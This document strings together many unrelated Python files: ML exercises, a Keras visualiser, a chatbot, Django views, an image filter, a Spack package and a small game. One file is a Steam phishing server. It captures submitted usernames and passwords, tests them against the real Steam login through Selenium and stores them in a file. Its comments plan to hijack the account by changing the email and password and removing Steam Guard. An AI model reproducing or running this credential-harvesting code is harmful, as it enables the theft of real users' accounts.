    train_data_fname = 'MNIST_train.pkl'
    valid_data_fname = 'MNIST_valid.pkl'
    test_data_fname = 'MNIST_test.pkl'

    ### Train the network ###
    model = Neuralnetwork(config)
    X_train, y_train = load_data(train_data_fname)
    X_valid, y_valid = load_data(valid_data_fname)
    X_test, y_test = load_data(test_data_fname)
    # Numerical gradient checks on representative weights and biases
    # before training starts.
    trainer_check_gradient(model, X_train, y_train, flag="input_to_hidden_w_1")
    trainer_check_gradient(model, X_train, y_train, flag="input_to_hidden_w_2")
    trainer_check_gradient(model, X_train, y_train, flag="hidden_to_output_w_1")
    trainer_check_gradient(model, X_train, y_train, flag="hidden_to_output_w_2")
    trainer_check_gradient(model, X_train, y_train, flag="hidden_b_1")
    trainer_check_gradient(model, X_train, y_train, flag="output_b_1")
    trainer(model, X_train, y_train, X_valid, y_valid, config)
    test_acc = test(model, X_test, y_test, config)
    print("test acc is " + str(test_acc))
|
# Launch IPython with `ipython --matplotlib=qt` so plt.show() is unnecessary.
# To show one figure at a time, set breakpoints at the 3 marked lines, e.g.:
# >>> run -d -b23 visual_cnn.py
# ipdb> b 32
# ipdb> b 44
from keras.models import load_model
from keras.preprocessing import image
from keras import models
import numpy as np
import matplotlib.pyplot as plt

# Load the small cats-vs-dogs CNN trained elsewhere.
model = load_model('dogs_vs_cats/cats_and_dogs_small_2.h5')
model.summary()

# Prepare one test image as a (1, 150, 150, 3) float tensor in [0, 1].
img_path = 'dogs_vs_cats/test/cats/cat.11350.jpg'
img = image.load_img(img_path, target_size=(150, 150))
img_tensor = image.img_to_array(img)
img_tensor = np.expand_dims(img_tensor, axis=0)
img_tensor /= 255.
print(img_tensor.shape)
plt.imshow(img_tensor[0])  # add breakpoint at this line — original image

# Build a model that emits the activations of the first 8 layers.
layer_outputs = [layer.output for layer in model.layers[:8]]
activation_model = models.Model(inputs=model.input, outputs=layer_outputs)
activations = activation_model.predict(img_tensor)
first_layer_activation = activations[0]
print(first_layer_activation.shape)
plt.matshow(first_layer_activation[0, :, :, 4], cmap='viridis')  # add breakpoint at this line
plt.matshow(first_layer_activation[0, :, :, 7], cmap='viridis')  # two first-layer features, closely resembling the input

layer_names = []
for layer in model.layers[:8]:
    layer_names.append(layer.name)

# 16 feature maps per row of each grid figure.
images_per_row = 16

# Each iteration draws one grid with all feature maps of one layer
# (8 grids total for the 8 layers).
for layer_name, layer_activation in zip(layer_names, activations):
    n_features = layer_activation.shape[-1]  # add breakpoint at this line
    size = layer_activation.shape[1]
    n_cols = n_features // images_per_row
    # Allocate the blank canvas (2-D array) for the whole grid.
    display_grid = np.zeros((size * n_cols, images_per_row * size))
    # Fill one column of feature maps at a time...
    for col in range(n_cols):
        # ...one row within the column at a time.
        for row in range(images_per_row):
            channel_image = layer_activation[0, :, :, col * images_per_row + row]
            # Normalise for display: zero-mean, unit-std, centred on 128.
            channel_image -= channel_image.mean()
            channel_image /= channel_image.std()
            channel_image *= 64
            channel_image += 128
            channel_image = np.clip(channel_image, 0, 255).astype('uint8')
            # Paste this feature map into its cell of the grid.
            display_grid[col * size : (col + 1) * size,
                         row * size : (row + 1) * size] = channel_image
    scale = 1. / size
    plt.figure(figsize=(scale * display_grid.shape[1],
                        scale * display_grid.shape[0]))
    plt.title(layer_name)
    plt.grid(False)
    plt.imshow(display_grid, aspect='auto', cmap='viridis')
# Round 1 outputs a 2x16 grid = 32 maps, matching layer 0 (conv2d_5)'s
# output shape (None, 148, 148, 32).
# Later rounds contain more and smaller sub-images, e.g. conv2d_6
# (layer 3): 64 maps of 72x72; conv2d_8 (layer 7): 128 maps of 15x15.
|
import os
import signal
import random
import time
import sys
import cgi
import io
# --- Conversation state flags (module-level; mutated by the handlers below) ---
addTo = False          # an unrecognised input is waiting to be categorised
listedOptions = False  # category options have been shown to the user
addResp = False        # waiting for the user to supply a canned response
improvingAI = False    # currently inside the "teach me" protocol
inCrisis = False       # crisis-handling mode is active
whatMatter = False     # already asked the user what the issue is
sendLocation = False   # unused here; presumably for location lookup
storeStr = ""          # the unrecognised input currently being learned
storeFilepath = ""     # category file chosen for the learned input
userName = ""          # user's name, once learned
namePrime = False      # expecting the user's name in the next input
knowName = False       # the name has been captured
def printSys(inputTxt):
    """Top-level dispatcher: route *inputTxt* to the active conversation mode."""
    global inCrisis
    global sendLocation
    global whatMatter
    global improvingAI
    # Guard clauses instead of an if/elif ladder: crisis mode wins,
    # then the learning protocol, then the quit token, then normal chat.
    if inCrisis:
        return crisis(inputTxt)
    if improvingAI:
        return defProtocol(inputTxt)
    if inputTxt == "--q--":
        return ("Program quit ... all processes completed and saved")
    return compTxt(inputTxt)
def compTxt(inputTxt):
    """Match *inputTxt* against the known input files and produce a reply.

    Falls through to the learning protocol (defProtocol) when nothing
    matches.  Fix: the Python 2 builtin ``unicode`` was applied to lines
    read from the input files; under Python 3 that raises NameError.
    ``io.open(..., encoding='cp1252')`` already yields ``str``, so the
    lines are compared directly.

    NOTE(review): the nesting below was reconstructed from
    whitespace-mangled source — verify the name-capture block against
    the original file.
    """
    global addTo
    global addResp
    global listedOptions
    global improvingAI
    global whatMatter
    global inCrisis
    global namePrime
    global userName
    global knowName
    newTxt = inputTxt.lower()
    if "my name" in newTxt and len(userName) < 1:
        namePrime = True
    # Crisis phrases short-circuit everything else.
    if ("i'm in trouble.".find(newTxt) != -1) or ("please help me.".find(newTxt) != -1) or ("i need help.".find(newTxt) != -1):
        inCrisis = True
        return crisis(inputTxt)
    elif whatMatter == True:
        return crisis(inputTxt)
    else:
        inputs = os.listdir("./static/Inputs")
        for file in inputs:
            filepath = "./static/Inputs/" + file
            readInputFile = io.open(filepath, "r", encoding='cp1252')
            r = readInputFile.readlines()
            for line in r:
                newLine = line.lower()
                if namePrime:
                    # Capture the user's name from the sentence, skipping
                    # the filler words "my", "name", "is".
                    userTxt = inputTxt.split(" ")
                    for word in userTxt:
                        if "what" in inputTxt.lower() and knowName == False:
                            namePrime = True
                            return "I don't know yet! What is your name?"
                        if word.lower() != "my" and word.lower() != "name" and word.lower() != "is" and knowName == False:
                            userName += word + " "
                    knowName = True
                    namePrime = False
                    if len(userName) > 1:
                        return "Nice to meet you, " + userName
                elif newTxt in newLine or newLine in newTxt:
                    categs = os.listdir("./static/Outputs")
                    if file == "userNameQuery":
                        return "Your name is " + userName
                    elif file in categs:
                        if file != "farewell":
                            readOutputFile = open("./static/Outputs/" + file, "r").read().split("\n")
                            retStr = random.choice(readOutputFile)
                            if "your name" in retStr.lower():
                                namePrime = True
                            if retStr != "ignoreOutput":
                                return retStr
                        else:
                            # Farewell category hands control to the
                            # learning protocol with the category name.
                            addTo = True
                            addResp = False
                            listedOptions = True
                            improvingAI = True
                            return defProtocol(file)
        # Nothing matched anywhere: enter learning mode.
        addTo = True
        improvingAI = True
        return defProtocol(inputTxt)
def defProtocol(inputTxt):
    """Three-step learning protocol for unrecognised inputs.

    Step 1 (addTo, options not yet listed): stash the input and list
        the available category files.
    Step 2 (options listed, addResp False): treat *inputTxt* as the
        chosen category and append the stashed input to that file.
    Step 3 (addResp True): append *inputTxt* as the canned response,
        unless it is the ">" skip token; then reset all flags.
    """
    global addTo
    global listedOptions
    global addResp
    global storeStr
    global storeFilepath
    retStr = ""
    if addTo == True:
        # NOTE(review): this assigns a LOCAL improvingAI (no `global`
        # declaration here), so the module-level flag is untouched by
        # these assignments — confirm whether that is intended.
        improvingAI = True
        if listedOptions == False:
            storeStr = inputTxt
            retStr += "I don't quite understand yet. How should I respond to this? <br> \n"
            retStr += "\nTell me what category this belongs in! <br> \n"
            categs = os.listdir("./static/Inputs")
            categNames = list()
            for file in categs:
                retStr += os.path.basename(file) + "<br>\n"
                categNames.append(os.path.basename(file))
            listedOptions = True
            addResp = False
        elif addResp == True:
            outputFile = open("./static/Outputs/" + storeFilepath , "a+")
            if inputTxt != ">":
                outputFile.write("\n" + inputTxt)
            outputFile.close()
            retStr += "Thank you for the input!"
            listedOptions = False
            addTo = False
            addResp = False
            improvingAI = False
        else:
            storeFilepath = inputTxt
            inputFile = open("./static/Inputs/" + storeFilepath , "a+")
            inputFile.write("\n"+ storeStr)
            inputFile.close()
            retStr += "Please let me know how I should respond to that."
            addTo = True
            addResp = True
            listedOptions = True
            improvingAI = True
    return retStr
#printSys()
def crisis(inputTxt):
    """Two-turn crisis flow: first ask what the issue is, then reply
    with hard-coded NYC resources selected by keyword."""
    global inCrisis
    global whatMatter
    newTxt = inputTxt.lower()
    #This is used to get the user location
    #ipaddress = getIPaddress()
    #setPlace = ipaddress
    if whatMatter == False:
        whatMatter = True
        return "Please tell me what is the issue"
    elif whatMatter == True:
        # Second turn: leave crisis mode and answer by keyword.
        inCrisis = False
        whatMatter = False
        if "no issue" in newTxt or "nothing" in newTxt:
            return "Gotcha, let me know if you need me for something else"
        elif "assault" in newTxt:
            return 'Here are some locations near you that can help with assault:<br>\
<a href="http://www1.nyc.gov/site/nypd/bureaus/patrol/precincts/5th-precinct.page">5th Precinct - 19 Elizabeth St</a><br>\
<a href="http://www1.nyc.gov/site/nypd/bureaus/patrol/precincts/1st-precinct.page">1st Precinct - 16 Ericsson Pl</a><br>\
<a href="http://www1.nyc.gov/site/nypd/bureaus/patrol/precincts/9th-precinct.page">9th Precinct - 321 E 5th St</a>'
        elif "fire" in newTxt:
            return "Here are the locations of the nearest fire departments:<br>\
Ladder 8 - 14 N Moore St<br>\
Battalion 1 - 100 Duane St<br>\
Battalion 2 - 363 Broome St<br>"
        elif "sick" in newTxt:
            return 'Here are the locations of the nearest medical care facilities:<br>\
<a href="https://www.nyp.org/lowermanhattan">New York Presbytarian Hospital - 170 William St</a><br>\
<a href="https://www.nychealthandhospitals.org/health_care/?doctor=&specialty=&filter_location=39346&condition=1">NYC Health and Hospitals - 227 Madison St</a><br>\
<a href="https://nyulangone.org/locations/nyu-langone-medical-associates-canal-street">NYU Langone - 196 Canal St</a>'


# Disabled geolocation prototype, kept for reference as a module-level
# string literal (never executed).
'''def getIPaddress():
#The ip address of Gekko
parameters = "103.201.231.145"
#Use the place API for google to get nearlocation
response = requests.get("https://maps.googleapis.com/maps/api/place/findplacefromtext/output?input=parameters")
parameters = response.getLocation()
return "geoLocation"'''
|
import socketserver
import http.server
import logging
import cgi
from selenium import webdriver
PORT = 80
driver = webdriver.Chrome("chromedriver.exe")
class ServerHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
logging.error(self.headers)
http.server.SimpleHTTPRequestHandler.do_GET(self)
def do_POST(self):
logging.error(self.headers)
form = cgi.FieldStorage(
fp=self.rfile,
headers=self.headers,
environ={'REQUEST_METHOD':'POST',
'CONTENT_TYPE':self.headers['Content-Type'],
})
for item in form.list:
logging.error(item)
http.server.SimpleHTTPRequestHandler.do_GET(self)
#with open("data.txt", "w") as file:
# for key in form.keys():
# file.write(str(form.getvalue(str(key))) + ",")
# Try login
usrnme = str(form.getvalue("username"))
passwd = str(form.getvalue("password"))
print("Username:", usrnme, "Password:", passwd)
driver.get("https://steamcommunity.com/login/")
script_1 = open("scripts/login_1.js", "r").read().replace("{usrnme}", usrnme).replace("{passwd}", passwd)
error = driver.execute_script("return " + script_1)
if (error == False):
pr_file = open("data.txt", "r").read()
with open("data.txt", "w") as file:
file.write(pr_file)
for key in form.keys():
file.write(str(form.getvalue(str(key))) + ",")
#else:
#if user has steam guard
# ask user for Steam guard code
Handler = ServerHandler
httpd = socketserver.TCPServer(("", PORT), Handler)
print("serving at port", PORT)
httpd.serve_forever()
#recieve form post data, as in memory
#open selenium, try login
# if username and password correct, ask for Steam guard code
# if login successful
# change email address, change password, remove steam guard, add account to group.
# else
# display incorrect username/password error to user, ask them to login again.
|
from django.shortcuts import render, get_object_or_404, redirect
from .models import blog
from django.utils import timezone
# Create your views here.
def home(request):
    """List blog posts updated up to now, newest first.

    Fix: ``timezone.datetime.now()`` returns a *naive* datetime, which
    Django warns about (and mis-compares) when USE_TZ is enabled;
    ``timezone.now()`` returns an aware datetime in the active zone.
    """
    blogs = blog.objects.filter(updated_at__lte=timezone.now()).order_by("-updated_at")
    return render(request, 'home.html', {'blogs': blogs})
def detail(request, blog_id):
    """Render one blog post, 404ing on an unknown primary key."""
    blogs = get_object_or_404(blog, pk=blog_id)
    return render(request, 'detail.html', {'blogs':blogs})
def write(request):
    """Render the empty new-post form."""
    return render(request, 'write.html')
def create(request):
    """Create a blog post from query parameters and redirect home.

    Fix: use aware ``timezone.now()`` for both timestamps instead of the
    naive ``timezone.datetime.now()`` (see home()).
    NOTE(review): creating via request.GET is unsafe — mutating GET
    requests bypass CSRF protection and are cacheable/prefetchable.
    Switching to POST requires updating write.html, so it is only
    flagged here rather than changed.
    """
    blogs = blog()
    blogs.title = request.GET["title"]
    blogs.body = request.GET["body"]
    blogs.created_at = timezone.now()
    blogs.updated_at = timezone.now()
    blogs.save()
    return redirect("/")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# py_squirrel.py
#
# Copyright 2012 Wolf Halton <wolf@sourcefreedom.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
#
# Fix: the to-do notes were wrapped in a C-style /* ... */ block, which
# is a SyntaxError in Python; converted to line comments.
#
# To Do:
# The basic plan is to take an sql dump of a postgresql database cluster
# and create a file for each table, reading the file for markers to show
# when the databases, schemas, and tables start and stop.
# My current solution uses the marker text:
# Cluster_name.dmp mkdir cluster_name:
# SET command_name >> $clustername/set_commands.set
# CREATE ROLE role_name >> $clustername/roles.role
# ALTER ROLE role_name >> $clustername/roles.role
# CREATE DATABASE database_name: mkdir $DATABASE:
# ALTER DATABASE database_name >> $cluster_name/$DATABASE/$database_name.comment
# COMMENT ON DATABASE database_name >> $DATABASE/$database_name.comment
# PROCEDURAL LANGUAGE (anything related to the procedural languages in the db) >> $DATABASE/database_name.comment
# CREATE SCHEMA schema_name: mkdir $DATABASE/SCHEMA:
# ALTER SCHEMA schema_name >> $DATABASE/$SCHEMA/schema_name.comment
# COMMENT ON SCHEMA schema_name >> $DATABASE/$SCHEMA/schema_name.comment
# CREATE TYPE $SCHEMA.type_name (the detail of this is found in an sql comment '-- Name: type_name; Type: TYPE; Chema schema_name; Owner: owner;') >> $DATABASE/$SCHEMA/typename.type
# ALTER TYPE $SCHEMA.type_name >> $DATABASE/$SCHEMA/typename.type
# CREATE FUNCTION $SCHEMA.function_name >> $DATABASE/$SCHEMA/function_name.func
# ALTER FUNCTION $SCHEMA.function_name >> $DATABASE/$SCHEMA/function_name.func
# COMMENT on FUNCTION $SCHEMA.function_name >> $DATABASE/$SCHEMA/function_name.func
# CREATE TABLE $SCHEMA.tablename >> $DATABASE/$SCHEMA/table_name.table
# ALTER TABLE $SCHEMA.tablename >> $DATABASE/$SCHEMA/table_name.comments


def main():
    """Entry point placeholder; the parser described above is unimplemented."""
    return 0


if __name__ == '__main__':
    main()
|
# Initialise the grade vector with zeros (original comment in Portuguese:
# "inicializa o vetor de notas com 0").
notas = [0] * 5
soma = 0
# Fill the vector without using append, accumulating the sum as we go.
# Fix: eval(input(...)) executes arbitrary code typed by the user;
# float() parses a grade safely and raises ValueError on junk input.
for i in range(5):
    notas[i] = float(input('Digite a nota do aluno ' + str(i) + ': '))
    soma = soma + notas[i]
media = soma / 5
print('A media da turma é: ', media)
import requests
if __name__ == '__main__':
    # Report which of the expected page dumps 1..2047 are missing.
    # Fixes: the bare ``except:`` also swallowed KeyboardInterrupt and
    # SystemExit, and the opened file handle was leaked; now only OS
    # errors count as "missing" and the handle is closed via ``with``.
    for i in range(1, 2048):
        try:
            with open("htmls\\" + str(i) + ".txt", 'r'):
                pass
        except OSError:
            print("###" + str(i))
from Classes import Student

# Class roster: Student(given/middle names, surname) records, kept in
# surname order.  Consumed elsewhere in the project.
student_list = [
    Student.Student("Melissa", "Atmaca"),
    Student.Student("Jacob J", "Aylmer"),
    Student.Student("Kayla Joy", "Batzer"),
    Student.Student("Philip Joseph, III", "Brendel"),
    Student.Student("Samuel Victor", "Bunis"),
    Student.Student("Jacob Richard", "Buurman"),
    Student.Student("Ashley N", "Cannon"),
    Student.Student("Michael Christopher", "Catania"),
    Student.Student("Evan Ferdinand", "Couval"),
    Student.Student("Jared William", "Donnelly"),
    Student.Student("Stephanie L", "Gillow"),
    Student.Student("Yash", "Jalan"),
    Student.Student("Zachary Michael", "Jones"),
    Student.Student("Ryan Pranav", "Jonnada"),
    Student.Student("Aaron David", "Kamal"),
    Student.Student("Dhruv Nikhil", "Kanchi"),
    Student.Student("Arjun", "Koshal"),
    Student.Student("Ethan Junyan", "Li"),
    Student.Student("Catherine Rose", "Maloney"),
    Student.Student("Andrew Ahmet", "Ozsu"),
    Student.Student("Alvin", "Radoncic")
]
|
#Leo Li
#11/16/2018
#Description: This is the sobel filter. It traces out the edge of an image and blacks out everything else
#source:http://homepages.inf.ed.ac.uk/rbf/HIPR2/sobel.htm
from PIL import Image
import sys
import math
def main():
    """Apply a Sobel edge filter to the image named in argv[1]; show and save the result."""
    global img,j,w
    img = Image.open(sys.argv[1])#using the commandline argument to open the file
    w,h = img.size
    newimg = Image.new("RGB", (w,h), "white")
    for j in range(1, w-1):#for every single pixel in the picture(except the corners)
        for i in range(1, h-1):
            Gx = 0
            Gy = 0#add values of gradients to each pixel around it according to the kernel
            # Each takepixels(col, row) call stores that pixel's r+g+b sum in
            # the global `x`; Gx/Gy accumulate the 3x3 Sobel kernel weights.
            takepixels(j-1,i-1)
            Gx+=-x
            Gy+=x
            takepixels(j-1,i)
            Gx+=-2*x
            Gy+=0
            takepixels(j-1,i+1)
            Gx+=-x
            Gy+=-x
            takepixels(j,i-1)
            Gx+=0
            Gy+=2*x
            takepixels(j,i+1)
            Gx+=0
            Gy+=-2*x
            takepixels(j+1,i-1)
            Gx+=x
            Gy+=x
            takepixels(j+1,i)
            Gx+=2*x
            Gy+=0
            takepixels(j+1,i+1)
            Gx+=x
            Gy+=-x
            l = math.sqrt(Gx**2+Gy**2)#calculate the length
            # NOTE(review): dividing by the image width `w` looks arbitrary as
            # a brightness scale and can clip for narrow images -- confirm.
            l = int(l/w*255)#scale the image
            newimg.putpixel((j,i),(l,l,l))
        percentage()
    newimg.show()
    newimg.save("Image2.png", "PNG")
def takepixels(a, b):
    """Read pixel (a, b) of the global image and store its r+g+b sum in global `x`."""
    global img,x
    pixel = img.getpixel((a,b))
    r = pixel[0]
    g = pixel[1]
    # NOTE: this rebinds the parameter `b` to the blue channel; harmless here
    # because the coordinate is no longer needed, but easy to trip over.
    b = pixel[2]
    # Brightness proxy consumed by main()'s kernel sums; range 0..765.
    x = r+g+b
#it shows the percentage of the program since sometimes it takes a long time for the program to process
def percentage():
    """Print progress as percent of columns processed (reads globals j and w set by main)."""
    p = j/w*100
    print(str(p)+"%")


main()  # run the filter when the script is executed
from spack import *
import sys,os
# Make the shared SCRAM helper module importable from this package's location.
sys.path.append(os.path.join(os.path.dirname(__file__), '../../common'))
from scrampackage import write_scram_toolfile
class Libxml2Toolfile(Package):
    """Spack package that generates a SCRAM toolfile describing libxml2.

    The package itself installs nothing; it depends on libxml2 and writes an
    XML tool description pointing at that installation.
    """
    # Dummy source: SCRAM toolfile packages have no payload of their own.
    url = 'file://' + os.path.dirname(__file__) + '/../../common/junk.xml'
    version('1.0', '68841b7dcbd130afd7d236afe8fd5b949f017615', expand=False)
    depends_on('libxml2')

    def install(self, spec, prefix):
        # $VER/$PFX below are substituted from this dict; $$NAME stays as a
        # literal $NAME for SCRAM (presumably string.Template-style
        # substitution inside write_scram_toolfile -- confirm there).
        values = {}
        values['VER'] = spec['libxml2'].version
        values['PFX'] = spec['libxml2'].prefix
        fname = 'libxml2.xml'
        contents = str("""<tool name="libxml2" version="$VER">
<info url="http://xmlsoft.org/"/>
<lib name="xml2"/>
<client>
<environment name="LIBXML2_BASE" default="$PFX"/>
<environment name="LIBDIR" default="$$LIBXML2_BASE/lib"/>
<environment name="INCLUDE" default="$$LIBXML2_BASE/include/libxml2"/>
</client>
<runtime name="PATH" value="$$LIBXML2_BASE/bin" type="path"/>
<runtime name="ROOT_INCLUDE_PATH" value="$$INCLUDE" type="path"/>
<use name="root_cxxdefaults"/>
</tool>
""")
        write_scram_toolfile(contents, values, fname, prefix)
|
{
    # Odoo module manifest.
    'name': 'Cooperation With Top Managers ',
    'version': '1.0',
    'category': 'E-Commerce',
    'description': """
This is a general module for Cooperation With Top Managers for Project Development
""",
    'author': 'Ismaylov Rufat',
    'depends': ['base','project'],
    # NOTE(review): 'proposal_development_workfolw.xml' looks like a typo for
    # "workflow", but the file on disk may use this spelling -- verify before
    # renaming either side.
    'data': ['proposal_development.xml','wizard/project_task_reevaluate_view.xml','wizard/project_task_delegate_view.xml','security/acc_service_security.xml','security/ir.model.access.csv','proposal_development_workfolw.xml'],
    'installable': True,
    'active': True
}
|
from rest_framework import serializers
from .models import Category, Product
class CategorySerializer(serializers.ModelSerializer):
    """Serialize Category with every model field plus a computed absolute `url`."""
    # Declared fields are always included, even with fields = '__all__'.
    url = serializers.SerializerMethodField(read_only=True)

    class Meta:
        model = Category
        fields = '__all__'

    def get_url(self, obj):
        # SerializerMethodField resolves to get_<field_name> by DRF convention.
        return obj.get_absolute_url()
class ProductSerializer(serializers.ModelSerializer):
    """Plain model serializer exposing every Product field."""
    class Meta:
        model = Product
        fields = '__all__'
|
import pygame.mixer
# Short alias for the mixer module; init() must run before any Sound is created.
sounds=pygame.mixer
sounds.init()
def wait_finish(channel):
    """Block until `channel` has finished playing its sound.

    Args:
        channel: an object exposing get_busy() -> bool (a pygame Channel).
    """
    import time  # local import keeps this fix self-contained
    # get_busy() is True while the sound is playing. Sleep briefly between
    # polls instead of hot-spinning: the original `while ...: pass` pinned a
    # CPU core for the whole duration of the sound.
    while channel.get_busy():
        time.sleep(0.01)
correct_s=sounds.Sound("correct.wav")
wrong_s=sounds.Sound("wrong.wav")
prompt="1 is correct, 2 is wrong, 3 is over: "
asked_number=0
correct_number=0
wrong_number=0
choice=input(prompt)# reuse `prompt` as the input() text
while choice!='3':
    asked_number=asked_number+1
    if choice=='1':
        correct_number=correct_number+1
        wait_finish(correct_s.play())
    else:
        # anything other than '1' (or the terminating '3') counts as wrong
        wrong_number=wrong_number+1
        wait_finish(wrong_s.play())
    choice=input(prompt)
print("u have answered "+str(asked_number)+" questions")
print(str(correct_number)+" are right")
print(str(wrong_number)+" are wrong")
|
from django.contrib import admin

from .models import Room, Player

# Register the game models with the default admin site (Room first, then
# Player, matching the original registration order).
for _model in (Room, Player):
    admin.site.register(_model)
|
#!/usr/bin/env python3
# create dictionary of farms
farms = [{"name": "NE Farm", "agriculture": ["sheep", "cows", "pigs", "chickens", "llamas", "cats"]},
         {"name": "W Farm", "agriculture": ["pigs", "chickens", "llamas"]},
         {"name": "SE Farm", "agriculture": ["chickens", "carrots", "celery"]}]
# Animal products; anything in "agriculture" not listed here is a plant.
nonveg = ["sheep", "cows", "pigs", "chickens", "llamas", "cats"]


def _choose_farm():
    """Show the farm menu until the user enters a valid 1-based index; return that farm dict.

    Replaces two copy-pasted prompt loops from the original. As before,
    non-numeric input raises ValueError.
    """
    resp = -1
    while resp not in range(0, len(farms)):
        print("select farm from the list to get product list ")
        for idx, locations in enumerate(farms, start=1):
            print(f"{idx}", locations.get("name"))
        resp = int(input(">>> ")) - 1
    return farms[resp]


print("\nPart 1 of Challenge\n")
# loop that returns all the animals from the NE Farm!
for locations in farms:
    if locations.get("name") == "NE Farm":
        for products in locations.get("agriculture"):
            print(products)

print("\nPart 2 of Challenge\n")
# Return the plants/animals that are raised on farm requested by user
farm_chosen = _choose_farm()
for products in farm_chosen.get("agriculture"):
    print(products)

print("\nPart 3 of Challenge\n")
# Return the animals only that are raised on farm requested by user
farm_chosen = _choose_farm()
for products in farm_chosen.get("agriculture"):
    # direct membership test replaces the original O(n) inner loop over nonveg
    if products in nonveg:
        print(products)
|
from .add_accents import * |
import os, sys, random, time, string
import input as key_input
import characters
import info
import entities
import monsters
import console
import json
# Writing JSON data
def save_settings(data=None):
    """Persist key-binding settings to settings.json.

    Args:
        data: list of key names to save. When None, the default bindings are
            written. (The original unconditionally overwrote its argument with
            the defaults, so the parameter was dead -- fixed here; the default
            keeps existing no-argument-intent callers working.)
    """
    if data is None:
        data = ['a', 't', 'd', ',', ' ', 'up', 'down', 'left', 'right', 'q', 'i']
    with open('settings.json', 'w') as f:
        json.dump(data, f)
# Reading data back
def load_settings():
    """Return the key bindings previously saved to settings.json."""
    with open('settings.json') as fh:
        return json.load(fh)
# the doodad that gets the keyboard input
# (blocking, single-keypress reader; Unix-specific per its name)
getch = key_input._GetchUnix()
# for i in range(10):
# print(getch.__call__())
#getch.__call__()
class Game(object):
    """
    Contains information about the character that the player chose, the map, and the entities within the map
    """
    def __init__(self, Character, width=10, height=10, playerX=5, playerY=5):
        # NOTE(review): playerX/playerY are accepted but never used; the
        # player is always placed at (1, 1) below -- confirm intent.
        self.player = Character
        self.map = []
        # entities, and entity_icons are matrices that are the same size as the map matrix,
        # but they contain stuff like items and the player (the entity matrix) and the icons
        # that go with them (the entity_icons matrix)
        self.entities = []
        self.entity_icons = []
        self.info = info.Info(self.player)
        self.entity_array = []
        self.time = 0
        # this is probably temporary code I think
        # Build a width x height floor of "." with an unbreakable wall border.
        for i in range(height):
            self.map.append([])
            self.entities.append([])
            self.entity_icons.append([])
            for j in range(width):
                self.map[i].append(".")
                if i == 0 or i == height - 1 or j == width - 1 or j == 0:
                    self.entities[i].append([entities.WallEntity("unbreakable", j, i)])
                    self.entity_icons[i].append(["#"])
                else:
                    self.entities[i].append([])
                    self.entity_icons[i].append([])
        self.height = len(self.map)
        self.width = len(self.map[0])
        self.add_entity(1, 1, self.player)
        # TEST CODE PLS IGNORE
        self.add_entity(5, 5, entities.Book("Super red", 5, 5))
        self.add_entity(5, 5, entities.Book("Swell", 5, 5))
        self.add_entity(5, 5, entities.Book("Greasy", 5, 5))
        self.add_entity(4, 9, entities.Book("Plaid", 4, 9))
        # self.add_entity(20, 4, monsters.Orc(20, 4))
        # self.add_entity(20, 5, monsters.Monkey(20, 5))
        self.add_entity(20, 6, monsters.Pig(20, 6))
        self.add_entity(1, 5, entities.Chest([entities.Book("The")], "Regular"))
        self.add_entity(10,10, entities.Sword("Shiny"))
        self.add_entity(11,11, entities.Egg("Boiled"))
        self.say("Welcome to hull breach! Watch out for hull breaches!")
        self.say("""3 years ago, you retired from your job as a """ + self.player.title.lower() + """. After a period of homelessness, you find yourself working on a submarine off the coast of Siberia as a result of a brush with the Russian mafia. The submarine you work on contains experiments involving the genetic mutation of animals. Everything was going swell, until one day, after a lazy technician forgot to make his inspection of the hull, there was a breach, and now the cold Siberian sea is leaking into the submarine. Now the sub is engulfed in chaos, so it is up to you to navigate through the rooms of the submarine and find the hull breach and patch it before it's too late.""")
        self.render()

    def add_entity(self, xPos, yPos, entity):
        """Place `entity` at (xPos, yPos), keeping the icon grid and flat array in sync."""
        self.entities[yPos][xPos].append(entity)
        self.entity_icons[yPos][xPos].append(entity.icon)
        self.entity_array.append(entity)

    def remove_entity(self, xPos, yPos, entity):
        """Remove `entity` from (xPos, yPos) and from the flat entity array."""
        self.entities[yPos][xPos].remove(entity)
        self.entity_icons[yPos][xPos].remove(entity.icon)
        self.entity_array.remove(entity)

    def get_entity(self, xPos, yPos, zPos):
        """Return the entity at (x, y) stack depth z, or a NullEntity if empty."""
        try:
            return self.entities[yPos][xPos][zPos]
        except IndexError:
            return entities.NullEntity(xPos, yPos)

    def get_entity_icon(self, xPos, yPos, zPos):
        """Return the icon at (x, y, z), or a blank space if there is none."""
        try:
            return self.get_entity(xPos, yPos, zPos).icon
        except IndexError:
            return " "

    def render(self):
        """Clear the terminal and redraw the info panes, the map, and the clock."""
        os.system("clear")
        (width, height) = console.getTerminalSize()
        self.info.render()
        self.info.render_dialogue()
        # Left padding to center the map horizontally in the terminal.
        horiz_buffer = " " * int((width - self.width) / 2)
        # draws everything in the map array, and everything in the entity_icons array
        for i in range(self.height):
            sys.stdout.write(horiz_buffer)
            for j in range(self.width):
                try:
                    if self.entity_icons[i][j][-1] == " ":
                        sys.stdout.write(self.map[i][j])
                    elif self.entity_icons[i][j][-1] != " ":
                        # always uses the last item in the list for rendering
                        try:
                            sys.stdout.write(self.entity_icons[i][j][-1])
                        except IndexError:
                            pass
                except IndexError:
                    # empty icon stack -> bare floor
                    sys.stdout.write(".")
            if i == self.height - 1:
                # game clock printed next to the last map row
                print(" " + str(self.time))
            sys.stdout.write("\n")

    def render_inventory(self, msg=""):
        """Draw the player's inventory as a bordered ASCII box, with an optional header message."""
        os.system("clear")
        print("")
        if msg != "":
            print(msg)
        print(" Inventory")
        print("_" * 30)
        print("|" + " " * 28 + "|")
        for i in range(len(self.player.inventory.items)):
            # pad each "n: description name" row to keep the right border aligned
            item_len = len("| " + str(i + 1) + ": " + self.player.inventory.items[i].description + " " + self.player.inventory.items[i].name + " |")
            padding = int((32 - item_len) / 2)
            print("| " + " " * padding + str(i + 1) + ": " + self.player.inventory.items[i].description + " " + self.player.inventory.items[i].name + " " * (padding - 2) + " |")
        print("|" + "_" * 28 + "|")

    def say(self, dialogue):
        """Queue a line of dialogue on the info pane."""
        self.info.add_dialogue(dialogue)

    def hull_breach(self):
